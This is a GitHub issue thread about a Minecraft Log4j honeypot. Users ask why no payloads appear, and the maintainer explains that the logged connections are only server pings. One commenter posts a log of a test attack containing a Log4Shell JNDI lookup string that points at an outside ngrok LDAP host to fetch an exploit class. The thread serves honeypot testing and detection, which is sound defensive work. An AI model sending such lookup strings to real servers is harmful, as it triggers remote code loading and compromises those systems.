Adikso/minecraft-log4j-honeypot

Testing example

Nenodema opened this issue · 7 comments

Nice honeypot! Could you please provide a script in order to test this? I have seen multiple attacks on my honeypot but "Payloads" stays empty.

I've been having the same issue as well. Not sure what is wrong. Maybe the payloads folder location.
Adikso, Where should the payloads folder be created with the Docker version?

Getting connections, but when I look into the payloads folder it is blank.

Thanks,

What do you mean by "attacks"? Are there "${jndi:ldap://XXXX}" messages showing up in the console output?
All players' messages and their nicknames are analysed and printed in the output.

Here is what I'm seeing for output:

2021/12/13 18:49:37 Waiting for connections on :25565
2021/12/14 06:37:19 New connection from XXX.XXX.XXX.XXX:19369
2021/12/14 06:37:19 Received handshake: 384 1 XXX.XXX.XXX.XXX:25565
2021/12/14 06:38:09 New connection from XXX.XXX.XXX.XXX:1646
2021/12/14 06:38:09 Received handshake: 384 1 XXX.XXX.XXX.XXX:25565
2021/12/14 21:01:03 New connection from XXX.XXX.XXX.XXX:59336
2021/12/14 21:01:03 Received handshake: 4 1 XXX.XXX.XXX.XXX:25565
2021/12/14 21:40:39 New connection from XXX.XXX.XXX.XXX:7388
2021/12/14 21:40:39 Received handshake: 4 1 XXX.XXX.XXX.XXX:25565

So, maybe I'm doing something wrong or my setup is not correct.

Thanks,

These are not attacks, somebody is just doing a server list ping. They didn't join the game.

Aw, ok thanks for letting me know. Can you post an attacker joining the game? Just so I have an example.

Hey @rangerrkm,
I set up the honeypot and tested it with my own account (no success getting any attacker to join yet). The logs for a successful attack look like this:

2021/12/16 04:30:24 New connection from xxx.xxx.xxx.xx:61768
2021/12/16 04:30:24 Received handshake: 754 2 xxx.xxx.xxx.xxx:25565
2021/12/16 04:30:24 Testing text: xxxxx
2021/12/16 04:30:24 xxxxx joined the server
2021/12/16 04:30:28 Testing text: ${jndi:ldap://2.tcp.ngrok.io:14179/Exploit}
2021/12/16 04:30:28 Fetching payload for: jndi:ldap://2.tcp.ngrok.io:14179/Exploit
2021/12/16 04:30:29 Saved payload to file 5ffa6880-42e1-4031-8016-6badde8169c8.class

Afterwards you can find the payload class in the payloads folder.

Thanks @nixrod for the information.